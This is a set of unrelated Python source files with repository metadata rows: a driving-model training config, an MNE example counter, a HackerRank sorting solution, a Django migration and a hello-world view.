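# the images, respectively (via the iaa.Sometimes wrappers defined above)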
self.augment_labels = False
self.augment_amount = 1 #3=max, 2=mid, 1=min
self.labels_to_augment = {"road": True, "buildings": True, "grass": True, "sky_n_zebra": True }
# there are files with data, 200 images each, and here we select which ones to use
#self.dataset_name = 'Carla'
#with open(os.path.join(self.save_data_stats, 'path'),'r') as f:
# path = f.read().strip()
path = '../VirtualElektraData2_Double'
train_path = os.path.join(path, 'SeqTrain')
val_path = os.path.join(path, 'SeqVal')
print train_path, val_path
self.train_db_path = [os.path.join(train_path, f) for f in glob.glob1(train_path, "data_*.h5")]
self.val_db_path = [os.path.join(val_path, f) for f in glob.glob1(val_path, "data_*.h5")]
# When using data with noise, remove the recording during the first half of the noise impulse
# TODO Felipe: change to noise percentage.
self.remove_noise = False
# Speed Divide Factor
#TODO: For now this is hardcoded, but eventually we should be able to calculate it from the data at loading time.
self.speed_factor = 1.0 # In KM/H. For GTA it should be maximum 30.0
# The division is made by three different data kinds
# in every mini-batch there will be equal number of samples with labels from each group
# e.g. for [[0,1],[2]] there will be 50% samples with labels 0 and 1, and 50% samples with label 2
self.labels_per_division = [[2],[2],[2]]
self.dataset_names = ['targets']
self.queue_capacity = 20*self.batch_size
# TODO NOT IMPLEMENTED Felipe: True/False switches to turn data balancing on or off
self.balances_val = True
self.balances_train = True
self.augment_and_saturate_factor = True
class configTrain(configMain):
def __init__(self):
configMain.__init__(self)
self.loss_function = 'mse_branched' # Choose between: mse_branched, mse_branched_ladd
self.control_mode ='base_no_speed'
self.learning_rate = 0.0002 # First
self.training_schedule = [[50000,0.5],[100000,0.5*0.5],[150000,0.5*0.5*0.5],[200000,0.5*0.5*0.5*0.5],[250000,0.5*0.5*0.5*0.5*0.5]] # Number of iterations, multiplying factor
self.lambda_l2 = 1e-3 # Not used
self.branch_loss_weight = [1]
self.variable_weight = {'Steer':1.0}
self.network_name = 'baseNet_deeper_noSpeed'
self.lambda_tolerance = 5
self.is_training = True
self.selected_gpu = "0"
self.state_output_size = (0)
class configOutput(configMain):
def __init__(self):
configMain.__init__(self)
self.print_interval = 2
self.summary_writing_period = 20
self.validation_period = 1000 # I consider validation an output thing since it does not directly affect the training in general
self.feature_save_interval = 100
self.use_curses = True # If we want to use the curses library for cleaner console printing
self.targets_to_print = ['Steer'] # Also prints the error. Maybe Energy
self.selected_branch = 0 # for the branches that have steering we also select the branch
self.inputs_to_print = ['Steer']
""" Feature Visualization Part """
# TODO : self.histograms_list=[] self.features_to_draw= self.weights_to_draw=
'''class configTest(configMain):
def __init__(self):
configMain.__init__(self)
self.interface_name = 'Carla'
self.driver_config = "3cam_carla_drive_config"
# This is the carla configuration related stuff'''
| [
"samkit@flytbase.com"
] | samkit@flytbase.com |
5b6fb0044aa0fdc39f7c453806b7c39d69030f1a | 8f56c6b257513990bf43e2dd2a49be5c46b155b2 | /testnew/testnew/testnew.py | 13aa908ee2bce21d0c1c91e4b697fb32681ae4b7 | [] | no_license | coldbasement/repos | 8c1d4ff9093d20ad1680166dafbfaf62d681ba0f | 268fcdb8f3f13268a99013f88add4509106119a4 | refs/heads/master | 2020-03-19T12:02:00.180982 | 2018-06-07T21:17:52 | 2018-06-07T21:17:52 | 136,491,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py |
def main():
import math
x = math.sin(3.14)
print(x)
main()
| [
"kodycarling19@gmail.com"
] | kodycarling19@gmail.com |
a61449f3af766300839db6e67e98a60f40fbf345 | 4da6c0e0817e7eb2c9fe56c8a910493f671500ac | /count_examples.py | b03e1f73d2ace86862090847ccc4b4be33ce9d79 | [] | no_license | jasmainak/mne_biomag2012_poster | ea610284a872582ee3eb376e5dcf0535de86da47 | 9cb11a4d42c770ca55ff27a884d83cae103c6152 | refs/heads/master | 2020-12-25T15:30:26.020379 | 2016-06-12T13:38:46 | 2016-06-12T13:38:46 | 60,969,076 | 0 | 0 | null | 2016-06-12T13:40:41 | 2016-06-12T13:40:41 | null | UTF-8 | Python | false | false | 716 | py | """Find number of examples in MNE-Python.
"""
# Author: Mainak Jas <mainak.jas@telecom-paristech.fr>
import os
import os.path as op
import fnmatch
from mne.datasets import sample
def recursive_search(path, pattern):
"""Auxiliary function for recursive_search of the directory.
"""
filtered_files = list()
for dirpath, dirnames, files in os.walk(path):
for f in fnmatch.filter(files, pattern):
filtered_files.append(op.realpath(op.join(dirpath, f)))
return filtered_files
# assuming sample data is in examples dir
example_path = op.dirname(sample.data_path())
example_files = recursive_search(example_path, '*.py')
print('Number of examples is %d' % len(example_files))
| [
"mainakjas@gmail.com"
] | mainakjas@gmail.com |
78e205ae750a4be5a068a55c9c559e1374f631e3 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /hacker_rank/domains/algorithms/sorting/almost-sorted_sunghyo.jung.py | 0264ebbc94a8388fd6ffbfafa0b6f4d7256e3e34 | [] | no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | n = int(input())
ar = map(int, raw_input().split())
d = []
for i in range(1, n):
if ar[i] < ar[i - 1]:
d.append(i)
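# d now holds every index i with ar[i] < ar[i-1], i.e. the positions that break
# the non-decreasing order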
if len(d) == 0:
    # already sorted; no operation is needed
    print("yes")
elif len(d) == 1:
a, b = d[0] - 1, d[0]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
elif len(d) == 2:
a, b = d[0] - 1, d[1]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
else:
    a = d[0] - 1
    b = d[len(d) - 1]
    # the out-of-order run must be contiguous AND reversing it must actually sort the array
    ar[a:b + 1] = ar[a:b + 1][::-1]
    if b - a == len(d) and ar == sorted(ar):
        print("yes")
        print("reverse %d %d" % (a + 1, b + 1))
    else:
        print("no")
| [
"sunghyo.jung@navercorp.com"
] | sunghyo.jung@navercorp.com |
8cdbe52a7d1fd25646f72b1380e0fb36d2bf577b | fa4350b54764c27f03f00b74d9ab2fa6f5b463cf | /ProfilePage/migrations/0013_merge_20200502_2143.py | 2ff0ba20f87eb734a3e828b904f578495620d9bd | [] | no_license | jakefahy/TheMemeExchange | 6cddf4c4674dede2c07147be85879495b136018f | b85aa7e3e5df72f45a9707df8401b68dfc7a8952 | refs/heads/master | 2022-12-10T12:50:43.848333 | 2020-05-10T00:27:18 | 2020-05-10T00:27:18 | 243,138,859 | 0 | 0 | null | 2022-12-08T03:44:40 | 2020-02-26T01:17:16 | HTML | UTF-8 | Python | false | false | 279 | py | # Generated by Django 3.1 on 2020-05-02 21:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ProfilePage', '0012_imagelink_username'),
('ProfilePage', '0012_auto_20200420_2212'),
]
operations = [
]
| [
"rbeck@csumb.edu"
] | rbeck@csumb.edu |
56d1e200aed3c2fb8edbf994fc0bed8f68d2b74d | 719a04c1b7fba23fac117a30e52ec588ec28c86e | /Django/proj1/proj1/view.py | a84dccd393df725f22a2336f635751dd489bcd00 | [] | no_license | BobXGY/PythonStudy | 1cbe2efc6f537ffbfb3141ef22d1cac0a9196a28 | 19e0491a15ba4cb29686a85c3a1c8500901ec173 | refs/heads/master | 2021-07-09T07:07:32.113174 | 2019-02-27T11:00:48 | 2019-02-27T11:00:59 | 148,768,967 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author Bob
# @create time 2018/12/20 14:38
# @file view.py
# @software PyCharm
from django.http import HttpResponse
def hello(request):
return HttpResponse("hello django")
| [
"736385398@qq.com"
] | 736385398@qq.com |